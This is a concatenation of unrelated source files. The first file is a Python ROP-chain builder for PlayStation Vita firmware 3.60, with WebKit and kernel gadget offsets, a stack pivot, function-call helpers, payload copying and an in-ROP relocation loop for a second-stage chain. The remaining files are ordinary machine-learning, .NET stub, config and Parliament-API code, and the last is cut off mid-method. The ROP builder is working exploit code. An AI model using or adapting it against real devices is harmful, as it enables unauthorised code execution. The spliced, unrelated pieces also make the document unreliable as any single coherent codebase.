    str_r1_r0_pop_r4 = SceWebKit_base + 0x1bd5b
    # cmp_r0_r4: sets r0 to 1 if r0 == r4 else 0, then pops r4-r6, pc:
    # CMP R0, R4
    # BNE loc_82340F94
    # MOVS R0, #1
    # B locret_82340F96
    #loc_82340F94
    # MOVS R0, #0
    #locret_82340F96
    # POP {R4-R6,PC}
    cmp_r0_r4 = SceWebKit_base + 0x840b7d
    mul_r0_r1_bx_lr = SceWebKit_base + 0x647d35
    mov_r0_sp_blx_r2 = SceWebKit_base + 0x1fe63b
    mov_r12_r0 = SceLibKernel_base + 0x809  # mov ip, r0 ; bx lr
    mov_sp_r12_pop_pc = SceLibKernel_base + 0x1111  # stack pivot
    pop_r0_to_r5 = SceWebKit_base + 0x8dd9b5
    blx_r4_pop_r4 = SceWebKit_base + 0xfcdbb
    str_r0_r4_pop_r4 = SceWebKit_base + 0x59a9
    bx_lr = SceWebKit_base + 0x575
    mov_r8_r0_mov_r0_r7_mov_r1_r6_blx_r2 = SceWebKit_base + 0x21a295  # mov r8, r0 ; adds r0, r7, #0 ; adds r1, r6, #0 ; blx r2
    mov_r3_r8_blx_r4 = SceWebKit_base + 0xcf481
    blx_r3_pop_r4_pc = SceWebKit_base + 0x10665d
    infloop = SceWebKit_base + 0x519  # hang forever (debugging / parking)
class Functions360:
    """Addresses of imported library functions on firmware 3.60.

    As with :class:`Gadgets360`, each value is an offset from a
    relocatable module base; the resulting absolute addresses are what
    the ROP chain branches to.  ``store``/``add`` point into SceWebKit
    (helper routines); the rest are kernel/libc/http/net imports.
    """
    sceKernelAllocMemBlock = SceLibc_base + 0x3C3AC
    sceKernelGetMemBlockBase = SceLibc_base + 0x3C39C
    sceKernelCreateThread = SceLibKernel_base + 0xACC9
    sceKernelGetThreadInfo = SceLibKernel_base + 0xA791
    sceKernelStartThread = SceLibKernel_base + 0xA789
    sceKernelWaitThreadEnd = SceLibKernel_base + 0x16FD
    sceHttpInit = SceLibHttp_base + 0x92FD
    sceHttpCreateTemplate = SceLibHttp_base + 0x947B
    sceHttpCreateConnectionWithURL = SceLibHttp_base + 0x950B
    sceHttpCreateRequestWithURL = SceLibHttp_base + 0x95FF
    sceHttpSendRequest = SceLibHttp_base + 0x9935
    sceHttpReadData = SceLibHttp_base + 0x9983
    store = SceWebKit_base + 0x106fc5
    add = SceWebKit_base + 0x130a15
    memcpy = SceLibc_base + 0x13F01
    memset = SceLibc_base + 0x14011
    sceIoDevctl = SceLibKernel_base + 0xA55D
    sceIoDevctl_svc = SceLibKernel_base + 0x690C
    sceIoOpen = SceLibKernel_base + 0xA4AD
    sceKernelDelayThread = SceLibHttp_base + 0x18544
    socket = SceNet_base + 0x27E1
    sceNetDumpCreate_svc = SceNet_base + 0x9FE0
    sceNetDumpDestroy = SceNet_base + 0x2909
    sceNetSyscallIoctl = SceNet_base + 0x9F90
    sceNetSyscallControl = SceNet_base + 0xA110
    sceNetSyscallClose = SceNet_base + 0x9F60
# Module-level singletons used throughout Rop360 below.
G = Gadgets360()
F = Functions360()
class Rop360(Rop):
    """ROP chain builder targeting firmware 3.60.

    Extends the generic ``Rop`` assembler with 3.60-specific calling
    helpers, a routine that embeds binary data inside the chain and
    copies it out at runtime, a gadget-only loop primitive (``repeat``)
    and an in-rop relocator (``relocate_rop``).

    NOTE(review): the list lengths and statement order in this class
    are load-bearing — several entries are back-patched with byte
    offsets computed from ``len(...)`` of the surrounding lists, so the
    code must not be restructured casually.
    """
    functions = F

    def __init__(self):
        """Allocate the scratch variables the chain primitives rely on."""
        super().__init__()
        # Used by repeat()
        self.loop_index = self.pre_alloc_var(4)
        self.loop_temp = self.pre_alloc_var(4)
        # Used by do_write_data
        self.write_data_temp = self.pre_alloc_var(4)

    def call_v7(self, func, a0=0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
        """Call *func* with up to seven immediate arguments.

        a0-a3 are popped into r0-r3; a4-a6 sit on the stack across the
        call and are consumed by the pop after it returns.
        """
        self.rop += [
            G.pop_r0_r1_r2_r3_r4_r5_pc,
            a0,
            a1,
            a2,
            a3,
            func,
            0,
            G.blx_r4_pop_r4_r5_r6_pc,
            a4,
            a5,
            a6,
        ]

    def call_rv6(self, func, a0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
        """Call *func* with a0 = the previous call's return value.

        Only r1-r3 are loaded, leaving r0 (the prior result) untouched,
        hence the assertion that a0 is the ``Ret`` marker.
        """
        assert(a0 is Ret)
        self.rop += [
            G.pop_r1_r2_r3_r4_pc,
            a1,
            a2,
            a3,
            func,
            G.blx_r4_pop_r4_r5_r6_pc,
            a4,
            a5,
            a6,
        ]

    def call_lv6(self, func, a0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
        """Call *func* with a0 dereferenced from memory (a0 is a ``Load``)."""
        assert(isinstance(a0, Load))
        self.rop += [
            G.pop_r0_r1_r2_r3_r4_r5_pc,
            a0,
            a1,
            a2,
            a3,
            0,
            0,
            G.ldr_r0_r0_pop_r4_pc,
            func,
            G.blx_r4_pop_r4_r5_r6_pc,
            a4,
            a5,
            a6,
        ]

    def call_llv(self, func, a0, a1, a2=0):
        """Call *func* with both a0 and a1 dereferenced from memory."""
        assert(isinstance(a0, Load))
        assert(isinstance(a1, Load))
        self.rop += [
            G.pop_r2_pc,
            a2,
            G.pop_r0_pc,
            a1,
            G.ldr_r1_r0_mov_r0_r1_pop_r4_pc,
            0,
            G.pop_r0_pc,
            a0,
            G.ldr_r0_r0_pop_r4_pc,
            func,
            G.blx_r4_pop_r4_pc,
            0,
        ]

    def write32(self, value, addr):
        """Store the 32-bit *value* at *addr* (str r0, [r1])."""
        self.rop += [
            G.pop_r0_r1_pc,
            value,
            addr,
            G.str_r0_r1_pop_r4,
            0,
        ]

    def infloop(self):
        """Park execution in an infinite-loop gadget."""
        self.rop += [
            G.infloop
        ]

    def crash(self):
        """Deliberately jump to an invalid address to crash the process."""
        self.rop += [
            0xdead,
        ]

    # Dispatch table of call helpers keyed by argument-kind signature
    # ('v' immediate value, 'r' previous return, 'l' load-from-memory);
    # presumably consumed by the base Rop class — verify there.
    _call_funcs = OrderedDict([
        ("vvvvvvv", call_v7),
        ("rvvvvvv", call_rv6),
        ("lvvvvvv", call_lv6),
        ("llv", call_llv),
    ])

    def call_r0(self):
        """Branch to the function pointer currently held in r0.

        r0 is shuffled through r8 into r3, then invoked via blx r3 with
        r0 reset to zero.
        """
        self.rop += [
            G.pop_r2_pc,
            G.pop_pc,
            G.mov_r8_r0_mov_r0_r7_mov_r1_r6_blx_r2,
            G.pop_r4_pc,
            G.pop_pc,
            G.mov_r3_r8_blx_r4,
            G.pop_r0_pc,
            0,
            G.blx_r3_pop_r4_pc,
            0,
        ]

    def do_write_data(self, data_binary):
        """Embed *data_binary* inside the chain and memcpy it to data_base.

        The payload words are appended after the current chain; a
        prepended stub computes their stack address at runtime (sp plus
        a back-patched constant) and memcpy's them to ``data_base``.

        NOTE(review): only ``len(data_binary) // 4`` whole words are
        emitted — a trailing partial word would be silently dropped;
        callers appear to pass 4-byte-aligned blobs, confirm.
        """
        part1 = [
            # r0 = sp
            G.pop_r2_pc,
            G.pop_pc,
            G.mov_r0_sp_blx_r2,
            # r0 += const
            G.pop_r1_pc,
            0xDEAD,
        ]
        part2 = [
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # [write_data_temp] = r0
            G.pop_r1_pc,
            self.write_data_temp,
            G.str_r0_r1_pop_r4,
            0,
            # r1 = [write_data_temp]
            G.pop_r1_pc,
            self.write_data_temp,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc, # sb
            G.ldr_r1_r1_blx_sb,
            # (dest) r0 = data_base
            G.pop_r0_pc,
            data_base,
            # (len) r2 = len(data_binary)
            G.pop_r2_pc,
            len(data_binary),
            G.pop_r4_pc,
            F.memcpy,
            # call memcpy(data_binary, SRC_past_rop, len)
            G.blx_r4_pop_r4_pc,
            0,
        ]
        # Back-patch the sp offset so r0 ends up pointing at the appended words.
        part1[-1] = (len(part2 + self.rop) + 2) * 4
        # Append data_binary as a series of words at the end of ropchain
        for word in range(0, len(data_binary) // 4):
            data = data_binary[word*4:(word+1)*4]
            num = u32(data)
            self.rop.append(num)
        # Prepend data_binary writer
        self.rop = part1 + part2 + self.rop

    def repeat(self, times, body):
        """Execute *body* (a list of rop words) *times* times.

        Implements a loop purely in rop: the trailer increments
        ``loop_index``, compares it to *times*, multiplies the result
        into a stack offset, and pivots sp backwards to re-enter the
        body (or falls through when done).
        """
        #---- Increment index
        # [index] += 1
        #---- Do loopy thingy
        # cmp [index], rop_size_words
        # r0 += -1
        # -- now R0 == 0 if [index] == rop_size_words, -1 otherwise
        # -- set R0 = sp offset if continue to loop, 0 if exiting rop chain
        # [temp] = r0
        # r0 = sp
        # r0 += [temp]
        # r0 += const
        # -- now r0 contains SP, implementing the IF, and we need to pivot to it
        # r12 = r0
        # Set loop_index to 0
        part1 = [
            G.pop_r0_r1_pc,
            0,
            self.loop_index,
            G.str_r0_r1_pop_r4,
            0,
        ]
        # body is executed here
        # Increment loop index by one, compare it
        part2 = [
            # [loop_index] += 1
            G.pop_r1_pc,
            1,
            G.pop_r0_pc,
            self.loop_index,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            G.pop_r1_pc,
            self.loop_index,
            G.str_r0_r1_pop_r4,
            0,
            # cmp [loop_index], times
            G.pop_r0_pc,
            self.loop_index,
            G.ldr_r0_r0_pop_r4_pc,
            times,
            G.cmp_r0_r4,
            0,
            0,
            0,
            # r0 += -1
            G.pop_r1_pc,
            0xFFFFFFFF,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # now R0 == 0 if [loop_index] == times, -1 otherwise
            # set R0 = sp offset if continue to loop, 0 if exiting rop chain
            G.pop_r1_pc,
            0xDEAD, # = +(number of |data| before RETURN) * 4 # FILLME
        ]
        part3 = [
            G.pop_r4_pc,
            G.mul_r0_r1_bx_lr,
            G.blx_r4_pop_r4_pc,
            0,
            # [loop_temp] = r0
            G.pop_r1_pc,
            self.loop_temp,
            G.str_r0_r1_pop_r4,
            0,
            # r0 = sp
            G.pop_r2_pc,
            G.pop_pc,
            G.mov_r0_sp_blx_r2,
        ]
        part4 = [
            # r0 += [loop_temp]
            G.pop_r1_pc,
            self.loop_temp,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc,
            G.ldr_r1_r1_blx_sb,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 += const
            G.pop_r1_pc,
            0xDEAD, # = (number of |data| after mov_r0_sp-blx_r2 and before RETURN_ADDRESS) * 4 # FILLME
        ]
        part5 = [
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # now r0 contains SP, implementing the IF, and we need to pivot to it
            # r12 = r0
            G.pop_r4_pc,
            G.mov_r12_r0,
            G.blx_r4_pop_r4_pc,
            0,
            G.mov_sp_r12_pop_pc,
            # only get here when the loop is complete
        ]
        # fill the FILLMEs
        part2[-1] = len(body + part2 + part3 + part4 + part5) * 4
        part4[-1] = len(part4 + part5) * 4
        self.rop += part1 + body + part2 + part3 + part4 + part5

    def relocate_rop(self, rop_base, rop_size_words, bases_base):
        """
        Relocates second-stage rop chain... in rop!
        Equivalent to:
        for x in range(num_words):
            rop[x] += bases[relocs[x]]
        Yes! Loops and conditions, in rop!
        - rop_base: address of pointer to rop base
        - rop_size_words: rop size in 4-byte words
        - bases_base: address of array of bases: [0, data_base, SceWebKit_base, ...]
        """
        # Now's a good time to turn around and close this file, trust me
        # ... you've been warned.
        # This is where we store current index of the loop
        index = self.pre_alloc_var(4)
        # This is temporary storage
        temp = self.pre_alloc_var(4)
        # Summary:
        #---- Store reloc base-addr into tmp
        # r0 = [index]
        # r0 += 4 * rop_size_words
        # r0 += [rop_base] < this is pointing to reloc for index's rop word
        # r0 = ldrb[r0] * 4
        # r0 += bases_base
        # r0 = ldr[r0]
        # [temp] = r0
        #---- Store relocated rop word into tmp
        # r0 = [index] * 4
        # r0 += [rop_base]
        # r0 = [r0]
        # r0 += [temp]
        # [temp] = r0
        #---- Load word from tmp and store it back into the chain
        # r0 = [index] * 4
        # r0 += [rop_base]
        # [r0] = [temp]
        self.repeat(rop_size_words, [
            # r0 = [index]
            G.pop_r0_pc,
            index,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            # r0 += 4 * rop_size_words
            G.pop_r1_pc,
            4 * rop_size_words,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 += [rop_base]
            G.pop_r1_pc,
            rop_base,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc, # sb
            G.ldr_r1_r1_blx_sb,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 = ldrb[r0] * 4
            G.ldrb_r0_r0_pop_r4,
            0,
            G.lsls_r0_2_pop_r4,
            0,
            # r0 += bases_base
            G.pop_r1_pc,
            bases_base,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 = ldr[r0]
            G.ldr_r0_r0_pop_r4_pc,
            0,
            # [temp] = r0
            G.pop_r1_pc,
            temp,
            G.str_r0_r1_pop_r4,
            0,
            # r0 = [index] * 4
            G.pop_r0_pc,
            index,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            G.lsls_r0_2_pop_r4,
            0,
            # r0 += [rop_base]
            G.pop_r1_pc,
            rop_base,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc,
            G.ldr_r1_r1_blx_sb,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 = [r0]
            G.ldr_r0_r0_pop_r4_pc,
            0,
            # r0 += [temp]
            G.pop_r1_pc,
            temp,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc,
            G.ldr_r1_r1_blx_sb,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # [temp] = r0
            G.pop_r1_pc,
            temp,
            G.str_r0_r1_pop_r4,
            0,
            # r0 = [index] * 4
            G.pop_r0_pc,
            index,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            G.lsls_r0_2_pop_r4,
            0,
            # r0 += [rop_base]
            G.pop_r1_pc,
            rop_base,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc, # sb
            G.ldr_r1_r1_blx_sb,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # [r0] = [temp]
            G.pop_r1_pc,
            temp,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc,
            G.ldr_r1_r1_blx_sb,
            G.str_r1_r0_pop_r4,
            0,
            # [index] += 1
            G.pop_r1_pc,
            1,
            G.pop_r0_pc,
            index,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            G.pop_r1_pc,
            index,
            G.str_r0_r1_pop_r4,
            0,
        ])
|
11521015
|
import numpy as np
import tensorflow as tf
from config import Config
import model as _model
from data_loader import get_datasets
import matplotlib.pyplot as plt
# Global plotting style for every figure produced by plot() below.
plt.style.use("seaborn-darkgrid")
flags = tf.app.flags
FLAGS = flags.FLAGS
# Path to the JSON file holding the run configuration (see Config.from_file).
flags.DEFINE_string(
    "config",
    "conf/SML2010.json",
    "Path to json file with the configuration to be run",
)
def get_np_array(session, model, next_element):
    """Exhaust an iterator and collect ground truth vs. predictions.

    Pulls batches from *next_element* until the iterator is exhausted
    (tf.errors.OutOfRangeError), feeding each batch through
    ``model.predictions``.  Returns a pair of flat numpy arrays:
    (true target values, predicted values).
    """
    truths = []
    predicted_vals = []
    while True:
        try:
            x, y = session.run(next_element)
            batch_preds = session.run(
                model.predictions,
                {model.driving_series: x, model.past_history: y},
            )
            truths.extend(np.reshape(y[:, -1], [-1]).tolist())
            predicted_vals.extend(np.reshape(batch_preds, [-1]).tolist())
        except tf.errors.OutOfRangeError:
            break
    return np.array(truths), np.array(predicted_vals)
def plot(
    session, model, train_next_element, val_next_element, test_next_element, name="tmp", show=True
):
    """Plot true vs. predicted target series for train/val/test splits.

    The three splits are concatenated along the x-axis (train, then
    val, then test).  When *show* is False the figure is saved to
    *name* instead of being displayed.
    """
    segments = [
        ("train", get_np_array(session, model, train_next_element)),
        ("val", get_np_array(session, model, val_next_element)),
        ("test", get_np_array(session, model, test_next_element)),
    ]
    plt.figure(figsize=(20, 5))
    offset = 0
    for label, (true_vals, pred_vals) in segments:
        xs = range(offset, offset + len(true_vals))
        plt.plot(xs, true_vals, label="%s true" % label)
        plt.plot(xs, pred_vals, label="%s predicted" % label)
        offset += len(true_vals)
    plt.ylabel("target serie")
    plt.xlabel("time steps")
    plt.legend(loc="upper left")
    if show:
        plt.show()
    else:
        plt.savefig(name, dpi=400)
        plt.close()
def evaluate(config):
    """Restore the best checkpoint and report RMSE/MAE/MAPE per split.

    Builds batched train/val/test datasets, restores the model from
    ``config.log_path / "model-max-ckpt"``, prints the metrics for each
    split and finally renders the combined prediction plot.
    """
    train_set, val_set, test_set = get_datasets(config, shuffled=False)
    train_set = train_set.batch(config.batch_size, drop_remainder=True)
    val_set = val_set.batch(config.batch_size, drop_remainder=True)
    test_set = test_set.batch(config.batch_size, drop_remainder=True)
    model = _model.TimeAttnModel(config)
    saver = tf.train.Saver(max_to_keep=1)

    def report(title, iterator, element):
        # Re-initialise the iterator, score the split and print its metrics.
        session.run(iterator.initializer)
        scores = model.evaluate(session, element)
        print("============%s=============" % title)
        print("RMSE: {:.5f}".format(scores["RMSE"]))
        print("MAE: {:.5f}".format(scores["MAE"]))
        print("MAPE: {:.5f}".format(scores["MAPE"]))

    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        train_iterator = train_set.make_initializable_iterator()
        val_iterator = val_set.make_initializable_iterator()
        test_iterator = test_set.make_initializable_iterator()
        train_next_element = train_iterator.get_next()
        val_next_element = val_iterator.get_next()
        test_next_element = test_iterator.get_next()
        # Restore from last evaluated epoch
        print("Restoring from: {}".format(config.log_path / "model-max-ckpt"))
        saver.restore(session, str(config.log_path / "model-max-ckpt"))
        report("Train", train_iterator, train_next_element)
        report("Validation", val_iterator, val_next_element)
        report("Test", test_iterator, test_next_element)
        # Re-initialise all iterators so plot() can stream every split again.
        session.run(train_iterator.initializer)
        session.run(val_iterator.initializer)
        session.run(test_iterator.initializer)
        plot(
            session,
            model,
            train_next_element,
            val_next_element,
            test_next_element,
        )
def main(argv):
    """tf.app entry point: load the configured hyper-parameters and evaluate."""
    config = Config.from_file(FLAGS.config)
    evaluate(config)


if __name__ == "__main__":
    tf.app.run(main=main)
|
11521031
|
# NOTE(review): auto-generated .NET interop stub (IronPython-style).  The
# bodies are intentionally empty placeholders — the real implementation
# lives in the CLR.  Do not hand-edit signatures; they mirror the managed
# overloads documented in the docstrings.
class RegistryAccessRule(AccessRule):
    """
    Represents a set of access rights allowed or denied for a user or group. This class cannot be inherited.
    RegistryAccessRule(identity: IdentityReference,registryRights: RegistryRights,type: AccessControlType)
    RegistryAccessRule(identity: str,registryRights: RegistryRights,type: AccessControlType)
    RegistryAccessRule(identity: IdentityReference,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
    RegistryAccessRule(identity: str,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
    """
    # Stub constructor; first parameter is named 'self' by the generator
    # even though this is a @staticmethod __new__ (generator quirk).
    @staticmethod
    def __new__(self,identity,registryRights,*__args):
        """
        __new__(cls: type,identity: IdentityReference,registryRights: RegistryRights,type: AccessControlType)
        __new__(cls: type,identity: str,registryRights: RegistryRights,type: AccessControlType)
        __new__(cls: type,identity: IdentityReference,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
        __new__(cls: type,identity: str,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
        """
        pass
    # Placeholder property triples (fget, fset, fdel) standing in for the
    # managed properties; values are meaningless outside the CLR.
    AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets the access mask for this rule.
    """
    RegistryRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets the rights allowed or denied by the access rule.
    Get: RegistryRights(self: RegistryAccessRule) -> RegistryRights
    """
|
11521044
|
import copy
from typing import Dict, Union, List
from pathlib import Path
from zsvision.zs_utils import memcache, concat_features
from typeguard import typechecked
from utils import memory_summary
from base.base_dataset import BaseDataset
class ActivityNet(BaseDataset):
    """ActivityNet video-text retrieval dataset.

    Supplies the per-split file lists, expert-feature paths and caption
    paths, and loads the (possibly concatenated) expert features plus
    text embeddings into memory via ``memcache``.
    """

    @staticmethod
    @typechecked
    def dataset_paths(training_file=None) -> Dict[str, Union[str, List[str], Path, Dict]]:
        """Return the relative paths describing this dataset.

        Args:
            training_file: optional override for the train list file; when
                None the default "train_list.txt" is used for every split.

        Returns:
            Dict with custom feature paths, feature names, subset lists,
            text-feature paths (regular and challenge) and the raw-caption
            pickle path.
        """
        subset_paths = {}
        test_splits = {
            "val1": "val_1_list.txt",
            "val": "val_list.txt",
            "public_server_val": "public_server_val.txt",
            "public_server_test": "public_server_test.txt",
        }
        for split_name, fname in test_splits.items():
            if training_file is None:
                subset_paths[split_name] = {"train": "train_list.txt", "val": fname}
            else:
                subset_paths[split_name] = {"train": training_file, "val": fname}
        feature_names = BaseDataset.common_feat_names()
        custom_paths = {
            "audio": ["aggregated_audio/vggish-audio-raw.pickle"],
            "speech": ["aggregated_speech/goog_w2v-speech-raw.pickle"],
            "ocr": ["aggregated_ocr_feats/ocr-w2v.pkl"],
            "face": ["aggregated_facefeats_25fps_256px_stride1/face-avg.pickle"],
        }
        text_feat_paths = BaseDataset.common_text_feat_paths()
        text_feat_dir = Path("aggregated_text_feats")
        text_feat_paths = {key: text_feat_dir / fname
                           for key, fname in text_feat_paths.items()}
        challenge_text_feat_paths = {}
        # include non-standard text features
        for text_feat in ("openai", ):
            text_feat_names = {key: f"{text_feat}-{key}"
                               for key in {"train", "val1"}}
            text_feat_paths[text_feat] = {key: f"aggregated_text_feats/{val}.pkl"
                                          for key, val in text_feat_names.items()}
            challenge_text_feat_paths[text_feat] = \
                f"aggregated_text_feats/{text_feat}.pkl"
        feature_info = {
            "custom_paths": custom_paths,
            "feature_names": feature_names,
            "subset_list_paths": subset_paths,
            "text_feat_paths": text_feat_paths,
            "challenge_text_feat_paths": challenge_text_feat_paths,
            "raw_captions_path": "raw-captions-train-val_1.pkl",
        }
        return feature_info

    def load_features(self):
        """Load expert features, text features and raw captions into memory."""
        root_feat = self.root_feat
        if self.distil_params is not None:
            # Optional distillation teachers: one cached feature dict each.
            self.distil_features = {}
            d_base_path = self.distil_params['base_path']
            teachers = list(map(lambda x: root_feat / Path(d_base_path + x), self.distil_params['teachers']))
            for i, f_name in enumerate(teachers):
                self.distil_features[i] = memcache(f_name)
        feat_names = {key: self.visual_feat_paths(key) for key in
                      self.paths["feature_names"]}
        feat_names.update(self.paths["custom_paths"])
        features = {}
        for expert, rel_names in feat_names.items():
            if expert not in self.ordered_experts:
                continue
            feat_paths = tuple([Path(root_feat) / rel_name for rel_name in rel_names])
            if len(feat_paths) == 1:
                features[expert] = memcache(feat_paths[0])
            else:
                # support multiple forms of feature (e.g. max and avg pooling). For
                # now, we only support direct concatenation
                msg = f"{expert}: Only direct concatenation of muliple feats is possible"
                print(f"Concatenating aggregates for {expert}....")
                assert self.feat_aggregation[expert]["aggregate"] == "concat", msg
                axis = self.feat_aggregation[expert]["aggregate-axis"]
                x = concat_features.cache_info()  # pylint: disable=no-value-for-parameter
                print(f"concat cache info: {x}")
                features_ = concat_features(feat_paths, axis=axis)
                memory_summary()
                # Make separate feature copies for each split to allow in-place filtering
                features[expert] = copy.deepcopy(features_)
        self.features = features
        if self.challenge_mode:
            self.load_challenge_text_features()
        else:
            text_feat_paths = self.paths["text_feat_paths"][self.text_feat]
            if isinstance(text_feat_paths, dict):
                text_features = memcache(root_feat / text_feat_paths["train"])
                text_features.update(memcache(
                    root_feat / text_feat_paths[self.split_name]))
            elif isinstance(text_feat_paths, (Path, str)):
                text_features = memcache(root_feat / text_feat_paths)
            else:
                raise TypeError(f"Unexpected type {type(text_feat_paths)}")
            self.text_features = text_features
        self.raw_captions = memcache(root_feat / self.paths["raw_captions_path"])

    def sanity_checks(self):
        """Validate assumptions this implementation makes about the data."""
        # Fix: the two f-string fragments previously concatenated without a
        # space, producing "...we assumethat the captions...".
        msg = (f"Expected to have single test caption for ANet, since we assume "
               f"that the captions are fused (but using {self.num_test_captions})")
        assert self.num_test_captions == 1, msg
|
11521055
|
from .card import Card, Cards, Batch, Deck
from .ranked import Leaderboard
from .match import Match, MatchHistory
from .status import Status
|
11521107
|
from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import video_prediction
# Resolve the repository root: two directory levels above the installed
# video_prediction package's __init__ file.
base_dir = video_prediction.__file__
base_dir = '/'.join(str.split(base_dir, '/')[:-2])
# Checkpoint/config directory for the short-context sawyer SAVP experiment.
modeldir = base_dir + '/robonet_experiments/sawyer/short_context'
# Visual-MPC video-prediction configuration consumed by setup_predictor.
configuration = {
    'pred_model': VPred_Model_Interface,
    'pred_model_class': SAVPVideoPredictionModel,
    'setup_predictor':setup_predictor,
    'json_dir': modeldir + '/model.savp.None',
    'pretrained_model':modeldir + '/model.savp.None/model-190000',   # 'filepath of a pretrained model to resume training from.' ,
    'sequence_length': 13,      # 'sequence length to load, including context frames.' ,
    'context_frames': 2,        # of frames before predictions.' ,
    'model': 'appflow',         #'model architecture to use - CDNA, DNA, or STP' ,
    'batch_size': 200,
    'sdim':5,                   # state dimension
    'adim':4,                   # action dimension
    'orig_size':[48,64],        # input image height x width
    'ndesig':1,                 # number of designated pixels
    'ncam':1,                   # number of cameras
}
|
11521126
|
import urllib.parse
import requests
import datetime
import xml.etree.ElementTree as ET
from .resource import Bill, EDM, Division, Member, parse_data, MemberList
from .parties import Parties
class Parliament(object):
    """Client for the UK Parliament Linked Data and Members Names APIs."""

    LDA_ENDPOINT = "http://lda.data.parliament.uk/"
    MEMBERS_NAMES_ENDPOINT = (
        "http://data.parliament.uk/membersdataplatform/services/mnis/members/query/"
    )

    def __init__(self):
        # Shared session so HTTP connections are pooled across requests.
        self.http = requests.Session()
        self.commons = Commons(self)
        self.lords = House("Lords", self)
        self.parties = Parties(self)

    def get_bills(self, limit: int = 50, page: int = 0):
        """Yield Bill objects from the paged bills.json feed."""
        res = self.get("bills.json", limit, page)
        for item in res["items"]:
            b = Bill(self)
            b.resource = item["_about"]
            b.title = item["title"]
            b.home_page = item["homePage"]
            b.type = item["billType"]
            b.date = parse_data(item["date"]).date()
            yield b

    def get(self, path: str, limit: int = None, page: int = None, additional_params=None):
        """ Make a request to the Linked Data API. Returns a python data structure.

        ``additional_params`` is an optional mapping of extra query
        parameters.  (Fix: it previously defaulted to a mutable ``{}``,
        the classic shared-default pitfall; ``None`` is now the default.)
        Raises ``requests.HTTPError`` on non-2xx responses.
        """
        params = {}
        if limit is not None:
            params["_pageSize"] = limit
        if page is not None:
            params["_page"] = page
        if additional_params:
            params.update(additional_params)
        url = self.LDA_ENDPOINT + path
        if len(params) > 0:
            url = url + "?" + urllib.parse.urlencode(params)
        res = self.http.get(url)
        res.raise_for_status()
        data = res.json()
        return data["result"]

    def get_members(self, **kwargs):
        """ Make a request to the Members Names API with the kwargs as parameters.
        Parameter documentation: http://data.parliament.uk/membersdataplatform/memberquery.aspx
        Returns an etree object of the XML
        """
        url = self.MEMBERS_NAMES_ENDPOINT
        # The Members Names API separates filters with '|', not '&'.
        url += "|".join(k + "=" + str(v) for k, v in kwargs.items())
        res = self.http.get(url)
        return ET.fromstring(res.text)
class Members(object):
    """Factory and identity cache of Member objects for one house."""

    def __init__(self, house):
        self.parl = house.parl
        self.house = house
        self._members = {}  # member_id -> Member (one instance per id)

    def from_id(self, member_id: int) -> Member:
        """Return the cached Member for *member_id*, creating it on first use."""
        if member_id not in self._members:
            self._members[member_id] = Member(self.parl, self.house, member_id)
        return self._members[member_id]

    def from_url(self, url: str) -> Member:
        """ Return a member from a data URL, e.g.:
        Commons: http://data.parliament.uk/members/4637
        Lords: http://data.parliament.uk/resources/members/api/lords/id/631
        (why are they different?)
        """
        return self.from_id(int(url.split("/")[-1]))

    def from_vote(self, data: dict) -> Member:
        """ Return a member from a short summary of that member, importing name and party
        from the summary to reduce additional requests.
        """
        # Fix: use isinstance() rather than `type(...) == dict` — idiomatic
        # and tolerant of dict subclasses returned by some JSON layers.
        if isinstance(data["member"][0], dict):
            # Commons
            member = self.from_url(data["member"][0]["_about"])
        else:
            # Lords
            member = self.from_url(data["member"][0])
        if "memberPrinted" in data:
            # Commons
            member.display_name = data["memberPrinted"]["_value"]
        else:
            # Lords
